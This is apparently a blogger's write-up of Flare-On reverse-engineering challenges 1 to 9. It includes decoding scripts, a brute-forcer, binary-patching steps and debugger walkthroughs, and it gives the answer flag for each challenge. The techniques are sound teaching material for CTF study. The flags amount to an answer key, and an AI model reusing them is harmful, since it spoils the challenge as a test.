Without further ado.
Flare-On!


Challenge #1


Let's roll up our sleeves and ... oh, nevermind, there's the routine.


The routine takes a given email address through ReadFile(), XOR's it by 0x7D, and compares it to an embedded value. So, just find that value in the executable with WinHex (one of my favorite tools) and XOR it there to get the answer. WinHex lets you just highlight text and do basic on-the-fly modification (rotate, addition, subtraction, XOR, etc).


bunny_sl0pe@flare-on.com
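
The same highlight-and-XOR step that WinHex performs can be sketched in Python 3. The actual bytes embedded in the executable aren't reproduced in this write-up, so the embedded value below is a stand-in derived from the known answer, and xor_bytes is a hypothetical helper name.

```python
def xor_bytes(data, key=0x7D):
    """XOR every byte of `data` with a single-byte key."""
    return bytes(b ^ key for b in data)

# Stand-in for the value stored in the binary (derived from the answer)
embedded = xor_bytes(b'bunny_sl0pe@flare-on.com')

# XOR is its own inverse, so applying the key again recovers the input
recovered = xor_bytes(embedded).decode('ascii')
```

Because XOR with a fixed key undoes itself, the routine that checks the input doubles as the routine that decodes the stored value.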



Filename Etymology: i_am_happy_you_are_to_playing_the_flareon_challenge
Borat-style filename?



Challenge #2

The difficulty jump to challenge 2 was slightly higher than expected for many people. It's unfortunate that most dropped out here.  #2 was best done in a debugger, and actually best demonstrated with IDA graph view:



This is a routine where I would re-implement the instructions, step by step. Load the values into a python script, mimic the values, and after each step make sure my script produces the same result as the debugger, until all done. The challenge takes an encoded value stored in-line with the code and decodes it. This value is best seen referenced in a debugger, but is seen here statically:


We see it load a WORD value of 0x1C7 into AX, but it actually only uses the lower half, 0xC7. From there, just basic register operations. I used the ROL function found in the comments of a Didier Stevens post.


def rol(byte, count):
    byte = (byte << count | byte >> (8 - count)) & 0xFF
    return byte

email = '\xAF\xAA\xAD\xEB\xAE\xAA\xEC\xA4\xBA\xAF\xAE\xAA\x8A\xC0\xA7\xB0\xBC\x9A\xBA\xA5\xA5\xBA\xAF\xB8\x9D\xB8\xF9\xAE\x9D\xAB\xB4\xBC\xB6\xB3\x90\x9A\xA8'
email = email[::-1]
AH = AL = AX = BX = DX = 0
result = ''

for i in range(0, len(email)):
    AH = rol(1, DX)
    AL = (ord(email[i]) - AH - 1) ^ 0xC7
    BX = BX + ord(email[i])
    DX = BX & 3
    result += chr(AL)
print result


When executed, this script prints the email address of:

a_Little_b1t_harder_plez@flare-on.com
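
The script in this post is Python 2. For readers on Python 3, where indexing a bytes object already yields integers, a rough port might look like the following. The function and constant names (`decode`, `ENCODED`) are my own; the byte values and the arithmetic are taken directly from the script.

```python
def rol(byte: int, count: int) -> int:
    """Rotate an 8-bit value left by count bits."""
    return ((byte << count) | (byte >> (8 - count))) & 0xFF

# Same encoded bytes as the Python 2 script, written as hex.
ENCODED = bytes.fromhex(
    "AF AA AD EB AE AA EC A4 BA AF AE AA 8A C0 A7 B0 BC 9A BA "
    "A5 A5 BA AF B8 9D B8 F9 AE 9D AB B4 BC B6 B3 90 9A A8"
)

def decode(encoded: bytes) -> str:
    bx = dx = 0
    out = []
    # The original script reverses the buffer before walking it.
    for value in reversed(encoded):
        ah = rol(1, dx)
        out.append(((value - ah - 1) ^ 0xC7) & 0xFF)
        bx += value
        dx = bx & 3
    return bytes(out).decode("ascii")

print(decode(ENCODED))
```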


Filename Etymology: very_success
Again a Borat-style filename? Would 'rol rol rol your boat' be too offensive?

Challenge #3

I loved #3, mostly because I love goats. Who doesn't?



When you look at the executable, it has the tell-tale icon for a Python executable. This makes things a bit easier:



I've worked a lot with Python executables and knew where to go. You would eventually find it through static analysis: it looks for a "PYZ" overlay in the executable, decompresses it, and runs the resulting compiled Python code:



Everyone has their favorite tools for dealing with such instances. My go-to is pyinstextractor, hosted on SourceForge. Run this against the original executable and it'll dump the results in your current directory. Now, the issue with this, which had me confused for honestly 30 minutes, is that it will overwrite anything in your directory. As it dumped the Python code to a file named 'elfie', overwriting the executable of 'elfie', I scrambled trying to find the original source. I didn't think to look again at the original file to realize it was overwritten. After a herp-derp moment, I opened the file and saw legitimate Python code, though obfuscated:


O0OO0OO00000OOOO0OOOOO0O00O0O0O0='IRGppV0FJM3BRRlNwWGhNNG'
OO0O0O00OO00OOOOOO0O0O0OOO0OOO0O='UczRkNZZ0JVRHJjbnRJUWlJV3FRTkpo'
OOO0000O0OO0OOOOO000O00O0OO0O00O='xTStNRDJqZG9nRCtSU1V'
OOO0000O0OO0OOOOO000O00O0OO0O00O+='Rbk51WXI4dmRaOXlwV3NvME0ySGp'
OOO0OOOOOOOO0000O000O00O0OOOO00O='ZnJvbSBQeVNpZGUgaW1wb3J'
##removed for brevity##
import base64
exec(base64.b64decode(OOO0OOOOOOOO0000O000O00O0OOOO00O+O0O00OO0OO00OO00OO00O000OOO0O000+O00OO0000OO0OO0OOO00O00000OO0OO0+O00OO00000O0OOO0OO0O0O0OO0OOO0O0+...


In this 56,694 line script there are thousands of variables holding what is obviously Base64 encoded data. While you could manually rename these and rebuild them, you could also just replace 'exec' with 'print' :)
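
To show why swapping 'exec' for 'print' is enough, here is a toy version of the same trick in Python 3. Everything in it is hypothetical: the three short variable names and the hidden one-liner stand in for the thousands of fragments in the real script.

```python
import base64

# Hypothetical stand-ins for the obfuscated variables: one Base64 string
# split into fragments that are only joined again at exec() time.
hidden_source = "print('hello from the inner script')"
blob = base64.b64encode(hidden_source.encode("ascii")).decode("ascii")
O0O0 = blob[:10]
OO00 = blob[10:25]
O00O = blob[25:]

# The obfuscated script would do: exec(base64.b64decode(O0O0 + OO00 + O00O))
# Printing instead reveals the next stage without running it.
recovered = base64.b64decode(O0O0 + OO00 + O00O).decode("ascii")
print(recovered)
```

The obfuscation only hides the order of concatenation, and the script itself has to know that order to run, so letting it do the work is the lazy (and correct) move.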

The result is another massive Python script. But, in this case, it's only 48 lines and the email is pretty apparent, though in reverse:




Reverse it out to show:

Elfie.L0000ves.YOOOO@flare-on.com


Filename Etymology: elfie
Sounds obvious: it's the alleged name of the goat.


Challenge #4

This challenge was a UPX-packed executable that, when unpacked, showed some unusual results:



A view through the unpacked main() shows that it takes an integer command line argument and performs an MD5 hash of it. Tracing this MD5 data we see that it is used to proceed to the second part, but has no other purpose. So, unnecessary and can be patched away.

UPX is very easy to work with, if you've never done it before. Open the unpacked version in IDA to find the entry point. Open in a debugger and scroll down until you see a JMP followed by a lot of DBs. Follow that jump, then go to the appropriate entry point and set a breakpoint. Done.

As we debug it, we see that 2 + 2 does, indeed, equal 4. This is a good sign.

The code does a few health checks. If 2 + 2 = 5, it would quit. If there wasn't an argument, it would quit. 

In this case, I know that a successful MD5 check will jump to a new location in the same function. So, before it even does that check, I'll just manually enter a jump to that new location:



After this, I follow down until I see the pretty apparent decoding routine:



I don't even bother at this point. I just trace the results in memory as this loops and out shoots the email address:



Uhr1thm3tic@flare-on.com

#ProTip: If you think you went too far in any program and missed what you're looking for, just search memory for "flare-on.com". In Olly/Imm open Memory map, go to top, and Ctrl-L / Ctrl-B down.
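
If you would rather dump the memory region to disk and search it offline, the same idea can be sketched in Python 3. This is a different route from the debugger search above, not what I did during the challenge; `find_flags` and the sample bytes are made up for illustration, and the pattern only catches plain ASCII strings (not UTF-16).

```python
import re

# Printable ASCII run followed by the domain every answer ends with.
EMAIL_RE = re.compile(rb"[\x21-\x7e]{1,64}@flare-on\.com")

def find_flags(blob: bytes) -> list:
    """Return every printable ASCII run that ends in @flare-on.com."""
    return [m.group().decode("ascii") for m in EMAIL_RE.finditer(blob)]

# Hypothetical dump contents standing in for a real memory region.
sample = b"\x00\x01junk\x00Uhr1thm3tic@flare-on.com\x00\xff"
print(find_flags(sample))
```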


Filename Etymology: youPecks
youPecks. You-P-Ecks. UPX. Hah!

Challenge #5

This was an awesome challenge, and a good change-up from what we're used to. In it we have an application that takes information from a local file, key.txt, and transmits it to a remote server. Given in the challenge is this application and a PCAP of the traffic, from which we need to recreate the original key.txt.

An analysis of the PCAP shows multiple HTTP POST sessions, each containing four bytes of ASCII. The final session contains the text "ZW==", whose trailing padding is a strong sign that this is Base64 data.



Instead of ripping them out piece by piece, I just dump and reformat with a script:


Yes, I could've used scapy or dpkt, but where's the ghetto in that? :)

We'll come back to that string later. Let's take a look at the application now. The sender is extremely basic and can be summarized in a very small main():



The contents of key.txt are read in, passed into encode_flarebearstare(), chunked into 3-byte segments, each Base64 encoded and transmitted by HTTP. What we really care about is the encoding routine, which is also pretty basic:


Each byte of the key has the value of the corresponding byte of the string 'flarebearstare' added to it, with the string repeating as needed.

That's all.

Can I just take a moment to say how awesome I think 'flarebearstare' is? I think they named their team FLARE solely to use that phrase, and I would've done the same!
To decode, then, we just need to Base64 decode the transmitted text and then take each byte and _subtract_ its respective 'flarebearstare' value. Easy peasy.

But, not so.

A first pass gave exceptions of negative numbers. Huh, that's weird. OK, we'll just make sure the result is a positive. and ... Nope. WTF?


A closer look at the application eventually shows the issue. The Base64 alphabet is wrong. The case is swapped!


After a few side tests, the only output difference is swapped case in the output string. With that, I take the transmitted Base64 string, swap the case, and it decodes perfectly with this script:



import base64
key = 'flarebearstare'
data_base64 = 'UDYs1D7bNmdE1o3g5ms1V6RrYCVvODJF1DpxKTxAJ9xuZW=='.swapcase()
data = base64.b64decode(data_base64)

result = ''
for i in range(0, len(data)):
    result += chr(ord(data[i]) - ord(key[i % 14]))
print result


Sp1cy_7_layer_OSI_dip@flare-on.com
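
For the curious, the claim that a case-swapped Base64 alphabet is the same thing as standard Base64 plus a swapcase can be checked with a round trip in Python 3. This is a sketch under a couple of assumptions: that the addition wraps at 256 (it never needs to for this key), and that encoding the whole buffer at once matches the sender's 3-byte chunking, which it should since Base64 works on 3-byte groups anyway. The function names are mine.

```python
import base64
import string

KEY = b"flarebearstare"
STD = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
SWAPPED = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+/"

def encode_key(plain: str) -> str:
    """Add the repeating key to each byte, then Base64 with the swapped alphabet."""
    raw = bytes((b + KEY[i % len(KEY)]) & 0xFF
                for i, b in enumerate(plain.encode("ascii")))
    standard = base64.b64encode(raw).decode("ascii")
    return standard.translate(str.maketrans(STD, SWAPPED))

def decode_transmitted(text: str) -> str:
    """Undo the swapped alphabet, Base64 decode, then subtract the key."""
    standard = text.translate(str.maketrans(SWAPPED, STD))
    raw = base64.b64decode(standard)
    return bytes((b - KEY[i % len(KEY)]) & 0xFF
                 for i, b in enumerate(raw)).decode("ascii")

captured = "UDYs1D7bNmdE1o3g5ms1V6RrYCVvODJF1DpxKTxAJ9xuZW=="
print(decode_transmitted(captured))
```

Mapping the swapped alphabet back onto the standard one is exactly what swapcase() does to the letters, which is why the one-liner in my script gets away with it.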


Filename Etymology: sender / challenge.pcap
No imagination here. A sending application and challenge. What about sendto_flare-a-lot? :)


Challenge #6

By this point, I was feeling good. There were no big hurdles, the challenges were fun, and I was getting to exercise some brain cells that had gone dormant from drinking. Until I got to challenge 6.

Then it was all like.



This challenge was an Android APK that, when executed, displays a screen to input an email address. I'll jump to the chase on this one; there's really only one function of note in this library, Java_com_flareon_flare_ValidateActivity_validate. There's some basic math operations here, but I'll let the other write-ups talk to those.

The algorithm checks to see if the passed input is 46 bytes. It will then take two bytes at a time, perform magic math on those two bytes, and then compare the results to a respective output array. With 23 arrays, the results seem simple. Do the math on each two bytes, if those bytes match the array, then they are correct.

Beyond that, I have no clue what this function is doing. I know what I've been told it's doing, I've read other people's explanations of it, and even had someone afterward sit down and walk me through it. Nope. Still no clue. I do believe that the brain is sometimes 'color blind' to things it shouldn't be, and this challenge fell within that for me.

After spending a month poking at this on almost a daily basis, I had mentally given up. The answer eventually came to me and, upon completion on 28 Aug, I even made a public joke about this based on the time durations of my challenges :)

Dat Gap Doe :D

After a week of trying to reimplement the routine in Python, I gave up. There were just too many unknowns to deal with, given Python's limited type casting, when you don't know what the intent of the code is. I needed to know what the expected outputs should look like. Therefore, I attempted to debug it using various local Android virtual machines. I first tried to use GenyMotion, which failed as they removed all ARM support. I then switched to BlueStacks. However, that has a 'broken' NAT implementation that only allowed outgoing traffic. And AndyVM kept crashing on a regular basis when making connections.

From there, I installed the IDA server on my own HTC One M7, which worked, but I then ran up against IDA Pro issues:




At this point, I was greatly urged to recreate the routine in C++, which I'm very weak at. I spent a few days trying to adapt to GCC, then gave up again.  It wasn't until someone noted that they had the code completely reimplemented that I learned you could just use Visual Studio, include 'windows.h', and have functional IDA decompiler code. I quickly installed VS2015, then worked to reimplement the routine, with a simple brute force wrapper that I stole from the Internet. I tested it out, running a set of two bytes and writing the block to the disk, comparing to the check tables. The structures checked out. More debugging helped show what was going on, to an extent.

For each run, I would copy one of the 23 check tables into the code, brute force it, and add that to my output email. This was made easy with the HxD hex editor as you can simply highlight a block of text and "Copy As C#", automatically formatting it for source code.



// FLARE6.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "stdio.h"
#include "windows.h"

static const char alphabet[] = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_-.=!#$%+@";
static const int alphabetSize = sizeof(alphabet) - 1;

const unsigned char rawData[92] = {
0x00,0x00,0x00,0x00,0x02,0x00,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};


unsigned char table[6952] = {
0x02,0x00,0x03,0x00,0x05,0x00,0x07,0x00,0x0B,0x00,0x0D,0x00,
0x11,0x00,0x13,0x00,0x17,0x00,0x1D,0x00,0x1F,0x00,0x25,0x00,
0x29,0x00,0x2B,0x00,0x2F,0x00,0x35,0x00,0x3B,0x00,0x3D,0x00,
// Truncated for brevity
0x2B,0x7E,0x2F,0x7E,0x35,0x7E,0x41,0x7E,0x43,0x7E,0x47,0x7E,
0x55,0x7E,0x61,0x7E,0x67,0x7E,0x6B,0x7E,0x71,0x7E,0x73,0x7E,
0x79,0x7E,0x7D,0x7E
};


void validate(const char *email)
{
    char a7E7E[1]; // I dunno?
    char s[6952];
    int byte1 = 0;
    int i = 0;
    int table_pos = 0;
    int table_value = 0;

    memset(s, 0, 3476);
    memset(a7E7E, 0, 1);

    if (email[i])
    {
        byte1 = email[i];
        if (email[i + 1])
            byte1 = (unsigned int)&a7E7E >= ((email[i] << 8) | email[i + 1]) ? (email[i] << 8) | email[i + 1] : 0;
    }

    do
    {
        table_value = *(WORD *)((char *)&table + table_pos);

        while (!(byte1 % table_value & 0xFFFF))
        {
            ++*(WORD *)&s[table_pos];
            byte1 = byte1 / table_value & 0xFFFF;
            if (byte1 <= 1) { goto LABEL_10; }
        }
        table_pos += 2;
    } while (table_pos != 6952);

LABEL_10:

    if (!memcmp(&rawData, s, 92)) { printf("%c%c\n", email[i], email[i + 1]); }
    return;
}

void bruteImpl(char *str, int index, int maxDepth)
{
    for (int i = 0; i < alphabetSize; ++i)
    {
        str[index] = alphabet[i];
        if (index == maxDepth - 1) { validate(str); }
        else { bruteImpl(str, index + 1, maxDepth); }
    }
}

int main()
{
    char a[2];
    bruteImpl(a, 0, 2);
    return 0;
}

After running through each set of characters I obtained the email address:

Should_have_g0ne_to_tashi_$tation@flare-on.com
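
In hindsight, and take this as one possible reading rather than gospel: the lookup table starts 2, 3, 5, 7, 11, 13, which looks like a list of primes, and the loop counts how many times each one divides the two-byte value. If that holds, each check table is just a list of prime exponents and a pair can be rebuilt by multiplying, no brute force needed. A Python 3 sketch using the one check table shown in the code (5 squared, 7, and the 38th prime), with helper names that are mine:

```python
def first_primes(count: int) -> list:
    """Return the first `count` primes by trial division."""
    primes = []
    candidate = 2
    while len(primes) < count:
        if all(candidate % p for p in primes if p * p <= candidate):
            primes.append(candidate)
        candidate += 1
    return primes

def pair_from_exponents(exponents: dict) -> str:
    """exponents maps a WORD index in the check table to its stored count."""
    primes = first_primes(max(exponents) + 1)
    value = 1
    for index, power in exponents.items():
        value *= primes[index] ** power
    # The validator packs the pair as (first << 8) | second.
    return chr(value >> 8) + chr(value & 0xFF)

# Non-zero WORDs of the rawData table shown in the code: index 2 holds 2,
# index 3 holds 1, index 37 holds 1 (assumes the table really is the primes).
RAW_DATA_EXPONENTS = {2: 2, 3: 1, 37: 1}
print(pair_from_exponents(RAW_DATA_EXPONENTS))
```

That table decodes to the final two characters of the address, which is at least consistent with the answer.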


Filename Etymology: android.apk / libvalidate.so
Oh, come on!  an_arm_and_a_leg? rockets_armed? Give us something.

Challenge #7

With #6 done, I first took a break to cry tears of relief into a bottle of bourbon. With two weeks left I had low expectations for finishing and so decided to have fun with the rest of the challenges.

Challenge 7 was another console application where you were to enter in a valid password (clue there, not an email). The trick here is that it is a .NET application.

Loading it into ILSpy/Reflector shows initially that there is encoding of some sort: the function names are all junk unicode names.



Running the file through de4dot produces output that is much more usable for analysis.

Like some of the later challenges, we see a lot of excessive junk here. There are five namespaces, each containing multiple attributes and classes. For now, ignore the attributes and focus on the handful of class files. Of those, one stands out as relevant:



namespace ns2
{
    using ns1;
    using System;
    using System.IO;
    using System.Reflection;
    using System.Security.Cryptography;
    using System.Text;

    internal class Class3
    {
        /* private scope */ static void Main(string[] args)
        {
            Class1 class2 = new Class1();
            MD5.Create();
            byte[] buffer = new byte[] {0xec,0x35,0xdd,0x8f,0xb3,0xd9,0xcb,0x17,0x57,0x7e,40,0x41,0x42,230,0x98,180};
            byte[] buffer2 = new byte[] {
                0x1f,100,0x74,0x61,0,0x54,0x45,0x15,0x73,0x61,0x6d,0x1d,0x4f,0x44,0x15,0x68,
                0x73,0x68,0x15,0x54,0x4e
            };
            byte[] bytes = new byte[] {"Warning! This program is 100% tamper-proof!"};
            byte[] buffer4 = new byte[] {"Please enter the correct password:"};
            byte[] buffer5 = new byte[] {"Y U tamper with me?"};
            byte[] buffer6 = new byte[] {"Thank you for providing the correct password."};
            byte[] buffer7 = new byte[] {"Use the following email address to proceed to the next challenge:"};
            Console.WriteLine(Encoding.ASCII.GetString(bytes));
            Console.Write(Encoding.ASCII.GetString(buffer4));
            string str = Console.ReadLine().Trim();
            string str2 = smethod_0(class2, buffer2) + '_' + smethod_3();
            if (str == str2)
            {
                Console.WriteLine(Encoding.ASCII.GetString(buffer6));
                Console.Write(Encoding.ASCII.GetString(buffer7));
                Console.WriteLine(smethod_1(str, buffer));
            }
            else
            {
                Console.WriteLine(Encoding.ASCII.GetString(buffer5));
            }
        }

        /* private scope */ static string smethod_0(Class1 class1_0, byte[] byte_0)
        {
            byte[] buffer = smethod_2();
            string str = "";
            for (int i = 0; i < byte_0.Length; i++)
            {
                str = str + ((char)(byte_0[i] ^ buffer[i % buffer.Length]));
            }
            return str;
        }

        /* private scope */ static string smethod_1(string string_0, byte[] byte_0)
        {
            RijndaelManaged managed = (RijndaelManaged)Rijndael.Create();
            byte[] buffer = new byte[] {
                0x1a,0xcb,20,0x9c,0xc4,15,0x38,0x5e,0x77,0xe3,0x31,0x42,0x24,0xfc,0x92,0xc3,
                0x77,80,0xdf,0x67,0xfb,240,0x3d,0x27,10,0x16,150,0x8e,0xa2,0xa7,100,0x99
            };
            byte[] bytes = new Rfc2898DeriveBytes(string_0, byte_0.Length) { Salt = byte_0 }.GetBytes(0x20);
            managed.IV = new byte[0x10];
            managed.Key = bytes;
            managed.Mode = CipherMode.CBC;
            managed.Padding = PaddingMode.ANSIX923;
            RijndaelManagedTransform transform = (RijndaelManagedTransform)managed.CreateDecryptor(managed.Key, managed.IV);
            MemoryStream stream = new MemoryStream(buffer);
            CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read);
            StreamReader reader = new StreamReader(stream2);
            string str = reader.ReadToEnd();
            stream.Close();
            stream2.Close();
            reader.Close();
            return str;
        }

        /* private scope */ static byte[] smethod_2()
        {
            return Assembly.GetExecutingAssembly().ManifestModule.ResolveMethod(0x6000001).GetMethodBody().GetILAsByteArray();
        }

        /* private scope */ static string smethod_3()
        {
            StringBuilder builder = new StringBuilder();
            MD5 md = MD5.Create();
            foreach (CustomAttributeData data in CustomAttributeData.GetCustomAttributes(Assembly.GetExecutingAssembly()))
            {
                builder.Append(data.ToString());
            }
            byte[] bytes = Encoding.Unicode.GetBytes(builder.ToString());
            return BitConverter.ToString(md.ComputeHash(bytes)).Replace("-", "");
        }
    }
}


From this routine a few things pop out. A call to Console.ReadLine().Trim() takes in the password from the user. Immediately after, calls to smethod_0() and smethod_3() are performed, with the results joined by an "_". If the joined string matches the input, you get the email. These functions also all take place within the same class, so we can ignore the remaining files.
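
The second half of the password, from smethod_3(), has a predictable shape even before you know its input: an MD5 over the UTF-16LE bytes of a string, printed as 32 uppercase hex characters. A Python 3 sketch of just that formatting step follows. The attribute text passed in is a placeholder I made up; the real input is the concatenated custom attribute data of the original assembly, which is not reproduced here.

```python
import hashlib

def attribute_hash(attribute_text: str) -> str:
    """MD5 over UTF-16LE bytes, formatted like BitConverter.ToString minus dashes."""
    return hashlib.md5(attribute_text.encode("utf-16-le")).hexdigest().upper()

# Placeholder input, NOT the real attribute data from the challenge binary.
print(attribute_hash("[hypothetical.Attribute()]"))
```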

One problem here is that part of the answer relies upon the metadata of the executable, a big block of metadata stored elsewhere in the file. Here's the original view of this data:




De-obfuscating the executable changes that block, so the resultant values will be completely different.



You can only work off the original. And that's not easy to do statically, nor with ILSpy.

Instead, we'll use dnSpy, which makes the solution almost effortless. In it we can simply look for the string builder with the underscore and the comparison immediately afterward:



Now, just debug. Step through the program until you get to this comparison, mouse over text2, and get your password.



metaprogrammingisherd_DD9BE1704C690FB422F1509A46ABC988

Boom!



Re-run the program, type that in, and get your email!



Justr3adth3sourc3@flare-on.com

Filename Etymology: YUSoMeta
Why are you so meta? The application relies on the metadata stored within the executable. 

Challenge #8


Challenge 8 was steganography, something that eluded many early in the challenge. The easy part of stego is having a wide selection of tools available. The hard part is knowing when to use them or not. I cannot even express the anguish over Robert Hanssen's actions and certain sectors of the forensic community having to use AnaDisk on every. single. floppy. disk. they processed. (To my knowledge, there were no positive results from trying it on every single investigation.)

The challenge started with a plain executable, gdssagh. While it prints a single message to the screen, it almost entirely contains a single stream of Base64 encoded data. Extracting this data, removing the carriage returns, and decoding results in a pretty picture.



From that point, I just throw tools at it :)  Honestly, if you're looking at what could be steg, your first stops should be StegSolve and ZSteg. StegSolve allows you to manually manipulate the data until you see what could be hidden data. It acts as a good first pass of the data, especially when viewing color planes.

A color plane is a sliced view of an image solely off of the bit of a single color. What would an image look like if you only saw the Most Significant Bit of Green? This:



The story comes out when we look at the Least Significant Bits (shown here of each color):




At a basic level, this tells us where the data "is" for a certain bit plane. In the LSB, we see a significant black area at the top. These black areas show "no value" (null) bytes. From knowing an executable structure, you can make a fairly good guess that one is in there. At a close enough view, you could imagine picking out the MZ, This Program Cannot Be ..., and PE headers. With that, I play with StegSolve's Data Analyzer and focus on the LSB planes for red, green, and blue (since all had the same data structure):



Close. Let's try MSB first (basically switching the bit order) ... I get the same results? I try again, and again with different files. It's a bug in the tool.



I hop over to ZSteg which, when executed, immediately finds our executable :) It detected it as data on RGB planes, MSB first, on an X>Y orientation.
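
To make "RGB planes, MSB first" less hand-wavy, here is a toy Python 3 sketch of LSB extraction with both bit orders. It works on a made-up list of pixel tuples rather than a real image file, and `embed_lsb` / `extract_lsb` are names I invented for the demo, not how ZSteg or StegSolve are implemented.

```python
def embed_lsb(pixels, payload):
    """Hide payload bits (MSB first) in the low bit of each colour channel."""
    bits = [(byte >> shift) & 1 for byte in payload for shift in range(7, -1, -1)]
    flat = [channel for pixel in pixels for channel in pixel]
    for index, bit in enumerate(bits):
        flat[index] = (flat[index] & 0xFE) | bit
    return [tuple(flat[i:i + 3]) for i in range(0, len(flat), 3)]

def extract_lsb(pixels, msb_first=True):
    """Collect the low bit of R, G, B in pixel order and pack into bytes."""
    bits = [channel & 1 for pixel in pixels for channel in pixel]
    out = bytearray()
    for start in range(0, len(bits) - 7, 8):
        chunk = bits[start:start + 8]
        if not msb_first:
            chunk.reverse()
        out.append(sum(bit << (7 - pos) for pos, bit in enumerate(chunk)))
    return bytes(out)

# Hypothetical 6-pixel "image" (18 channels, enough for two hidden bytes).
cover = [(200, 100, 50)] * 6
stego = embed_lsb(cover, b"MZ")
print(extract_lsb(stego, msb_first=True))
print(extract_lsb(stego, msb_first=False))
```

Pick the wrong bit order and every byte comes out bit-reversed, which is fixable after the fact as long as you recognize what happened.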



But, that StegSolve bug really got on my nerves. I dumped the output and then just changed the bit pattern myself, with more stolen internet code:


def reverse(x):
    result = 0
    for i in xrange(8):
        if (x >> i) & 1: result |= 1 << (8 - 1 - i)
    return result

data = open('stegsolver.out.dat', 'rb').read()
output = ''

for i in data:
    output += chr(reverse(ord(i)))

print output[0:4]
open('correct.exe', 'wb').write(output)


And, that worked! I received a file with the same MD5 hash as ZSteg produced. Stupid bug... When executed, this program spat out the email:


Im_in_ur_p1cs@flare-on.com



Filename Etymology: gdssagh
Is there a meaning to this? It just appears as drunken keyboard walking. I'm thinking it's an internal term, likely a password for an APT campaign (because they never keyboard walk, lol).

Challenge #9


Now, we get to the harder challenges. This is where I can show my true ghetto analysis attitude! And where I start taking studious notes on everything. I have a week left to get three more challenges done, so the pressure is on.

And let's start off with a backhanded compliment of a program.



Followed by a look at some instructions and then a big sea of data.


LOLWUT?



I really dislike the IDA debugger (I'm heavily reliant on Right Click>Follow in Dump) but it's best for this challenge. There's a lot of code to get through and most of it useless and, for me, IDA does a better job of recognizing and assembling this code as you step along.

The first goal is to focus on the actual input portion in all of that. So, let's run it in the debugger, then step through until we get to the input. Set a breakpoint after that part, type in some unique junk ('ABCD_1234_ABCD_1234@flare-on.com'). Then start a debugger trace with Instruction Tracing. Then, hit F9, and relax.

This trace output contained 9,600 instructions. Not bad. Not easily readable either. Let's channel our inner Unix admin. I'm at an advantage: I work from home, I've already started growing out my neck beard.



Wait, what? Where am I going with all this ... We're looking for loops. We're looking for the same instructions to be called with varying registers. We've seeded the registers with somewhat unique values. I'm hoping to find a mov, xor, cmp, or something usable.

A first pass shows that there are no EAX = 00000031 or 00000065. After digging a little deeper, I see it:


I know that at 0x401A9C each respective byte is loaded into AL. Let's then poke around for any single-byte XOR's with 'grep' (Are you cringing at this process yet? I know you are. And I like that.)



Boom! So at 0x012FDF8 are calls regarding single-byte XOR. This may not even be relevant, but I like to just log this stuff as I see it. While we're at it, let's hunt for any other math routines:



We know from our input breakpoint that the program picks up around 0x40173B. I can see that also as the top of a loop. Based on that, I can search through the trace to find the bottom of the loop that causes a jz/jnz back to there. I see that at 0x401BC8. So now we have a fairly confined boundary to focus on.

Since we see the routine looping, we can sort-of conclude that it's not exiting if a byte is wrong. Based on this, can we determine the overall email length? Let's try.

Run a new trace with a unique and long "email". For this test, I'll use:

ABCDEFGHIJLKMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz

Because we know each character is unique, and we know the location, we can run a simple:



At 41 bytes it stops checking bytes, so we have a pretty high fidelity guess to the email length. The only reason I do a sort | uniq here is that the results are repeated twice, for some reason. So they show up as 82 bytes (two checks of 41 bytes each).

At this point, I'll follow the code from AL all the way down to see what happens to it.

.text:00401A9C mov     al, [eax+ecx]
Stack[000007B0]:0012FDF4 mov     ah, [esp+ebx+0B4h]    ; XOR key as AH
.text:00401B14 rol     al, cl                          ; ROL key as CL
.text:00401B16 mov     ebx, [esp+ebx+2Ch]              ; Load cmpxchg value into EBX
Stack[000007B0]:0012FDF8 cmpxchg bl, dl


That last exchange, cmpxchg, was elusive to discover. When debugging, IDA would never display this opcode properly, nor the hex bytes around it, shown here at address 0x12FDF8:



I knew something was happening here, but could not determine exactly what. So, I switched to Immunity and saw the operation jump out:



At the very end, the respective input byte, after these operations, would be compared to a static table using cmpxchg. Knowing this, I thought of all the possible ways to collect these values and map them out. Then I thought of the worst way possible... spreadsheets!

Yes. I loaded an Excel spreadsheet and, for each byte, marked the XOR byte, ROL byte, and ultimate CMPX value. Is that a look of disgust I see? Oh yeaaahh
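
If spreadsheets offend you, the same bookkeeping fits in a few lines of Python 3. This sketch assumes the per-byte transform is "XOR with the key, then ROL by the count, then compare", which is how I read the listing above; the rows below are fabricated from a sample string purely to show the round trip and are not the real table values.

```python
def rol8(value: int, count: int) -> int:
    """Rotate an 8-bit value left."""
    count %= 8
    return ((value << count) | (value >> (8 - count))) & 0xFF

def ror8(value: int, count: int) -> int:
    """Rotate an 8-bit value right (the inverse of rol8)."""
    return rol8(value, (8 - count) % 8)

def forward(ch: int, xor_key: int, rol_count: int) -> int:
    """What the program is assumed to do to each input byte before the compare."""
    return rol8(ch ^ xor_key, rol_count)

def recover(cmp_value: int, xor_key: int, rol_count: int) -> int:
    """Undo the steps in reverse order to get the expected input byte."""
    return ror8(cmp_value, rol_count) ^ xor_key

# Hypothetical spreadsheet rows: (XOR key, ROL count, compare value).
sample = b"Is_th1s"
keys = [(0x11 * (n + 1) & 0xFF, n % 8) for n in range(len(sample))]
rows = [(k, r, forward(c, k, r)) for c, (k, r) in zip(sample, keys)]

print(bytes(recover(cmp_value, k, r) for k, r, cmp_value in rows).decode("ascii"))
```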



Once the routine was discovered, that was about 5 minutes to collect, reverse, and decode the email of:

Is_th1s_3v3n_mai_finul_foarm@flare-on.com



Filename Etymology: you_are_very_good_at_this
Other than a possible backhand compliment, especially when combined with input text, there's no real idea behind this.


Challenge #10


